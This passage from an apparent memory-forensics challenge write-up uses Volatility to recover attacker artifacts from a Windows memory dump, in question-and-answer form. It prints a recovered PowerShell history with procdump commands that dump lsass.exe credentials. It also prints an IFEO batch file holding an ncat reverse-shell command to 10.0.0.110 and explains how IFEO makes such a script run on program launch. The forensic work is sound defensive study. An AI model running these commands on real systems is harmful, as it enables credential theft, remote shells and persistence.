</pre></div></div><div><br /></div></div><div><div>We know above, that PowerShell was a cause of concern. Maybe this "<i>ConsoleHost_history.txt</i>" file has information that may be able to help us understand what transpired. We did not get enough insights from the command line output. Maybe, just maybe, there is something useful in this file. Time will tell.</div><div><br /></div><div>From the list of files returned, there seems to be a mapped/network drive. </div><div><br /></div><div>Q: What is the drive letter associated with the mapped/network drive?</div><div>A: Z: </div><div><br /></div><div>Q: What is the path of this mapped/network drive?</div><div>A: \;Z:00000000000fc3bd\vmware-host\Shared</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | tail --lines=2 | sort --unique
\;Z:00000000000fc3bd\vmware-host\Shared</span>
</pre></div></div><div><br /></div></div><div>Preparing to dump the contents of the PowerShell history file. Create a folder to story the files.</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">mkdir powershell_history && ls powershell_history</span>
</pre></div></div><div><br /></div></div><div><div>Get the address of the PowerShell history from the filescan.txt file.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep "\ConsoleHost_history.txt"
0xe78bf2f82a00 \Users\securitynik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 216</span>
</pre></div></div><div><br /></div></div><div><div>Dump the address:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir powershell_history/ --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.dumpfiles --virtaddr 0xe78bf2f82a00</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf2f82a00 ConsoleHost_history.txt file.0xe78bf2f82a00.0xe78bf66cc6d0.DataSectionObject.ConsoleHost_history.txt.dat</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What network scanning tool was being searched for via the command prompt?</div><div><b>A:</b> nmap.exe </div><div><br /></div><div><b>Q:</b> What is the command used to perform the search?</div><div><b>A:</b> "<i>dir /s c:\nmap.exe</i>"</div><div><br /></div><div><b>Q:</b> What is in this PowerShell history file? As in reconstruct this file to get its contents.</div><div><b>A:</b> The commands that were run on the host inside of the PowerShell prompt as seen below</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat powershell_history/file.0xe78bf2f82a00.0xe78bf66cc6d0.DataSectionObject.ConsoleHost_history.txt.dat
Invoke-WebRequest -Uri http://10.0.0.106/putty.exe
dir
cd ..
dir
Invoke-WebRequest -Uri http://10.0.0.106/putty.exe putty.exe
exit
d:
cmd
exit
cd \
cd tools
cd .\SysinternalsSuite\
.\procdump.exe -ma lsass.exe c:\tmp\lsass.dmp
ps
.\procdump.exe -ma TabTip tabtip.dmp
.\procdump.exe -ma msedge.exe msedge.dmp
del *.tmp
del *.dmp
dir *.dmp
del .\notepad.dmp .\firefox.dmp
del .\FindLinks.exe
del .\firefox.dmp
cd \
cd tools
cd .\SysinternalsSuite\
del .\firefox.dmp
.\procdump.exe -ma msedge.exe c:\tmp\edge.dmp
dir c:\tmp\edge.dmp
.\procdump.exe -ma lsass.exe c:\tmp\lsass.exe.dmp
dir c:\tmp
.\procdump64.exe /?
.\procdump.exe -64 -ma lsass.exe c:\tmp\lsass.exe.dmp
.\procdump.exe -accepteula -64 -ma lsass.exe c:\tmp\lsass.exe.dmp
cls
psexec -h
cmd
cd 'C:\Program Files\'
dir
cd ..
cd '.\Program Files (x86)\'
dir
cd .\Microsoft\
dir
cd .\Edge\
dir
cd .\Application\
dir
cd .\114.0.1823.79\
dir
.\msedge.exe --proxy-server="socks5://127.0.0.1:9999"
cd "c:\Program Files (x86)\Google\Chrome\Application\"
cd "c:\Program Files (x86)\Google\Chrome\Application\"cd ..
cd ..
cd \
cd '.\Program Files\'
dir
cd .\Google\
dir
cd .\Chrome\
dir
cd .\Application\
dir
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
dir
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
cmd
dir /s c:\nmap.exe</span></pre></div></div></div><div><br /></div><div><div>Summary of file contents</div><div><br /></div><div>Above confirms some of what we saw before. Let's however take a quick synopsis.</div><div><br /></div><div><i>invoke-webrequest</i> was used to download the putty.exe file. We also see attempts to dump the lsass.exe process which contains all the credential information. We can see <i>procdump </i>was run multiple times in different forms in an attempt to dump lsass.exe. Maybe these failed?! </div><div><br /></div><div>One common tool used for dumping passwords is <i>mimikatz</i>, maybe we should check if this was found in the files. </div><div><br /></div><div><b>Q:</b> Was <i>minimkatz </i>found within this memory dump?</div><div><b>A:</b> Yes</div><div><br /></div><div><b>Q:</b> If Yes: What is the path it can be found in?</div><div><b>A: </b>C:\TOOLS\mimikatz_trunk</div><div><br /></div><div>We also see attempts to dump <i>tabtip</i> and <i>msedge.exe</i> from the memory using <i>procdump</i>. All <i>*.tmp </i> and <i>*.dmp </i>files were deleted along with some other files. We also see attempts to use <i>msedge.exe</i> with the proxy server which was setup earlier. Maybe that did not work, then the attempt was made to use <i>chrome.exe</i>. We also see a search on the <i>cmd.exe </i>shell for <i>nmap.exe</i>. </div><div><br /></div><div><br /></div><div>While we are here. There is a batch file (".bat") that was found.</div><div><br /></div><div><b>Q: </b>What does "ifeo" stand for?</div><div><b>A:</b> IFEO stands for Image File Execution Options. In this case, I can configure this batch file to run whenever notepad (or any other application) is started. This way, whenever you run notepad (or that application), execute this script and gain access to your computer.</div><div><br /></div><div>Learn more about IFEO here: <a href="https://www.malwarebytes.com/blog/news/2015/12/an-introduction-to-image-file-execution-options">An Introduction to Image File Execution Options | Malwarebytes Labs</a></div><div><br /></div><div>Make a directory to dump <i>ncat.exe </i>contents.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">mkdir ncat_dump</span>
</pre></div></div><div><br /></div></div><div><div>Extract the file at that memory address.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.dumpfiles --virtaddr 0xe78bf6e4f250</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e4f250 ncat-ifeo.bat file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat</span>
</pre></div></div><div><br /></div></div><div><div><b>Q: </b>What is the virtual address of this file?</div><div><b>A:</b> The address of the <i>.bat </i>file is at <i>"0xe78bf6e4f250"</i></div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep --perl-regexp '\.bat'
</span><b><span style="color: #fcff01;">0xe78bf6e4f250 </span></b><span style="color: white;">\TOOLS\ncat-ifeo.bat 216</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What is the contents of this file?</div><div><b>A: </b>See below.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat ncat_dump/file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat
cmd.exe /c start c:\tools\ncat.exe --nodns --verbose 10.0.0.110 80 --exec cmd.exe</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What will be achieved when this command is run?</div><div><b>A: </b>Looking at the <i>ifeo.bat</i> file, we see the host is configured to send its shell (<i>cmd.exe</i>) to the device at <i>10.0.0.110 </i>on port <i>80</i>. While the port is different, this is similar to what we saw with the persistence mechanism earlier. Even more reason to conclude the attacker may be at <i>10.0.0.110</i>.</div><div><br /></div><div>When looking at the file scan, we see saw two entries for <i>ncat.exe</i>.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep ncat.exe
0xe78bf6aa7120 \Program Files (x86)\Nmap\ncat.exe 216
0xe78bf6ad55c0 \Program Files (x86)\Nmap\ncat.exe 216</span></pre></div></div><div><br /></div><div>We can extract both files and confirm their hashes.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6aa7120
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
ImageSectionObject 0xe78bf6aa7120 ncat.exe file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6ad55c0
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
ImageSectionObject 0xe78bf6ad55c0 ncat.exe file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ md5sum ncat_dump/*
</span><b><span style="color: #fcff01;">89dc4c7b0477978aa3b7dfb4e7a93163</span></b><span style="color: white;"> ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.</span><span style="color: #fcff01;"><b>ncat.exe.</b></span><span style="color: white;">img
</span><b><span style="color: #fcff01;">89dc4c7b0477978aa3b7dfb4e7a93163 </span></b><span style="color: white;">ncat_dump/file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.</span><span style="color: #fcff01;"><b>ncat.exe</b></span><span style="color: white;">.img
45860d2ded9caca15c1d10e756e1a0c7 ncat_dump/file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat</span>
</pre><div><br /></div></div></div><div><br /></div></div></div><div><div><b>Q:</b> How many files are seen for <i>ncat.exe</i>?</div><div><b>A:</b> 2</div><div><br /></div><div><b>Q:</b> If you had multiple files, are these files the same?</div><div><b>A:</b> Yes. The hashes say they are.</div><div><br /></div><div><b>Q:</b> If they are, what makes you conclude so?</div><div><b>A:</b> Their md5sum hash<br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">md5sum ncat_dump/*
</span><span style="color: #fcff01;"><b>89dc4c7b0477978aa3b7dfb4e7a93163</b> </span><span style="color: white;">ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
</span><b><span style="color: #fcff01;">89dc4c7b0477978aa3b7dfb4e7a93163 </span></b><span style="color: white;">ncat_dump/file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div><b>Q:</b> What type of "file" is this?</div><div><b>A:</b> This is a Windows 32-bit executable. Here is the file information.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><b><span style="color: #fcff01;">file </span></b><span style="color: white;">ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img: </span><b><span style="color: #fcff01;">PE32 executable (console)</span></b><span style="color: white;"> Intel 80386, for MS Windows, 5 sections</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What architecture (x86 or x64) was it designed for?</div><div><b>A:</b> 80386 or x86 or i386</div><div><br /></div><div><b>Q:</b> What OS is it designed to run on?</div><div><b>A:</b> Windows</div><div><br /></div><div><b>Q:</b> What type of application is it? (GUI or console)?</div><div><b>A:</b> Console Application</div><div><br /></div><div><b>Q:</b> How many sections are there in this file?</div><div><b>A:</b> 5 Sections</div><div><br /></div><div><b>Q:</b> What is/are the name(s) of the section(s) header(s)</div><div><b>A: </b></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><b><span style="color: #fcff01;">objdump </span></b><span style="color: white;">ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img </span><b><span style="color: #fcff01;">--section-headers</span></b><span style="color: white;">
ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img: file format pei-i386
Sections:
Idx Name Size VMA LMA File off Algn
</span><span style="color: #fcff01;"><b>0 .text</b> </span><span style="color: white;"> 000442dd 002e1000 002e1000 00000400 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
</span><b style="color: white;"> </b><b><span style="color: #fcff01;">1 .rdata</span></b><b style="color: white;"> </b><span style="color: white;"> 0000ccce 00326000 00326000 00044800 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
</span><b><span style="color: #fcff01;">2 .data</span></b><span style="color: white;"> 00000600 00333000 00333000 00051600 2**2
CONTENTS, ALLOC, LOAD, DATA
</span><b><span style="color: #fcff01;">3 .rsrc</span></b><span style="color: white;"> 000001e0 00336000 00336000 00051c00 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
</span><b><span style="color: #fcff01;">4 .reloc</span></b><span style="color: white;"> 00003400 00337000 00337000 00051e00 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA</span>
</pre></div></div><div><br /></div><div><b>Q: </b>What is the name of the section at index 0?</div><div><b>A:</b> .<i>text</i></div><div><br /></div><div>Q: What does this section typically contain?</div><div>A: The .text section is where the actual code is kept.</div><div><br /></div><div>Q: What is the virtual memory address of the "<i>AddressOfEntryPoint</i>" for the executable?</div><div>A: 00044663. Indicates the location of the entry point of the application. Another way of looking at it, is the address from which the Windows loader will begin execution.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">objdump ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img --all-headers | grep 'AddressOfEntryPoint'
BFD: error: ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img(.reloc) is too large (0x3400 bytes)
AddressOfEntryPoint </span><b><span style="color: #fcff01;">00044663</span></b>
</pre></div></div><div><br /></div></div></div><div><div><b>Q:</b> What is the file size of the extracted file?</div><div><b>Q:</b> What is the File Modification Date/Time?</div><div><b>Q:</b> What is the file Access Date/Time?</div><div><b>Q:</b> What is the File Permissions?</div><div><b>Q:</b> What I the "Linkver Version" used to link this file?</div><div><b>Q:</b> What is the Time Stamp on the file?</div><div><b>Q:</b> What is the OS Version, Image Version and Subsystem version?</div><div><b>Q:</b> What is the Subsystem?</div><div><br /></div><div><b>A:</b> All the answers can be found below:</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><b><span style="color: #fcff01;">exiftool </span></b><span style="color: white;">ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
ExifTool Version Number : 12.67
File Name : file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
Directory : ncat_dump
File Size : 339 kB
File Modification Date/Time : 2023:12:07 09:35:35-05:00
File Access Date/Time : 2023:12:07 09:36:19-05:00
File Inode Change Date/Time : 2023:12:07 09:35:35-05:00
File Permissions : -rw-------
File Type : Win32 EXE
File Type Extension : exe
MIME Type : application/octet-stream
Machine Type : Intel 386 or later, and compatibles
Time Stamp : 2023:05:19 23:12:28-04:00
Image File Characteristics : Executable, 32-bit
PE Type : PE32
Linker Version : 14.29
Code Size : 279552
Initialized Data Size : 76288
Uninitialized Data Size : 0
Entry Point : 0x44663
OS Version : 6.0
Image Version : 0.0
Subsystem Version : 6.0
Subsystem : Windows command line</span></pre><div><br /></div></div></div></div><div><br /></div><div><div><b>Q:</b> What does the first 128 bytes of this file contain and what does it confirm?</div><div><b>A: </b>The first 128 bytes contains the following:</div><div>This confirms this is a Windows executable.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><b><span style="color: #fcff01;">xxd -len 128</span></b><span style="color: white;"> ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000 MZ..............
00000010: b800 0000 0000 0000 4000 0000 0000 0000 ........@.......
00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000030: 0000 0000 0000 0000 0000 0000 1801 0000 ................
00000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468 ........!..L.!Th
00000050: 6973 2070 726f 6772 616d 2063 616e 6e6f is program canno
00000060: 7420 6265 2072 756e 2069 6e20 444f 5320 t be run in DOS
00000070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000 mode....$.......</span>
</pre></div></div><div><br /></div><div>Looking at prefetch files:</div><div><br /></div><div><b>Q:</b> How many prefetch files were returned?</div><div><b>A: </b>There were 45 Prefetch files returned</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep --perl-regexp "\.pf" | awk --field-separator=' ' '{ print $2 }' | sort --unique | wc --lines
45</span>
</pre></div></div><div><br /></div><div>Analyzing the prefetch files, allow us to understand the number of times a program was run, the time the program was executed, etc.</div><div><br /></div><div>Extracting the <i>certutil.exe</i> file.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep certutil -i
</span><b><span style="color: #fcff01;">0xe78bf6e6ba90 \Windows\System32\certutil.exe</span></b><span style="color: white;"> 216
0xe78bf6e6e7e0 \Windows\Prefetch\CERTUTIL.EXE-28F1E0C1.pf 216
</span><b style="color: white;">0xe78bf7934500 \Windows\System32\en-US\certutil.exe.mui 216</b><b>
</b></pre></div></div><div><b><br /></b></div></div><div><div><b>Q:</b> What is the sha256 hash of this <i>certituil.exe</i> file found via the <i>filescan</i>:</div><div><b>A: </b></div></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">sha256sum certutil_dump/file.0xe78bf6e6ba90.0xe78bf7065d40.ImageSectionObject.certutil.exe.img
</span><b><span style="color: #fcff01;">e886ee1a0f92803e4b884ff099d9bbc717fe3cc6cd86f719d52f132776226493</span></b><span style="color: white;"> certutil_dump/file.0xe78bf6e6ba90.0xe78bf7065d40.ImageSectionObject.certutil.exe.img</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>We know from our earlier analysis, we have a HTTP server.</div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat netstat.txt | grep http
0xe78bf3af4740 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af4740 TCPv6 :: 80 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5920 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv6 :: 443 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af4060 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000</span>
</pre></div></div><div><br /></div><div><b>Q:</b> What port(s) is the HTTP server listening on?</div><div><b>A:</b> 80 and 443</div><div><br /></div><div><b>Q:</b> Is the server listening on IPv4, IPv6, None or both?</div><div><b>A:</b> Both</div><div><br /></div><div><b>Q:</b> What is the name of the HTTP process?</div><div><b>A:</b> httpd.exe</div><div><br /></div><div><b>Q:</b> What is the process ID(s) associated with the http process?</div><div><b>A:</b> 10008, 5088</div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep httpd
10008 8100 httpd.exe 0xe78bf6fb6080 1 - 1 False 2023-11-16 23:26:15.000000 N/A Disabled
5088 10008 httpd.exe 0xe78bf61b9080 156 - 1 False 2023-11-16 23:26:16.000000 N/A Disabled</span>
</pre></div></div><div><br /></div><div>Still dealing with files. This time specifically files associated with HTTP. More specifically, the <i>"access.log" </i>file.</div><div><br /></div><div><b>Q:</b> How many entries of the "<i>access.log</i>" file was returned?</div><div><b>A:</b> There were 5 files returned</div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep "access.log"
0xe78bf4c62130 \xampp\apache\logs\access.log 216
0xe78bf6e72980 \xampp\apache\logs\access.log 216
0xe78bf6e72ca0 \xampp\apache\logs\access.log 216
0xe78bf6e75d10 \xampp\apache\logs\access.log 216
0xe78bf6e76800 \xampp\apache\logs\access.log 216
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep "access.log" | wc --lines
5
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir access_log</span>
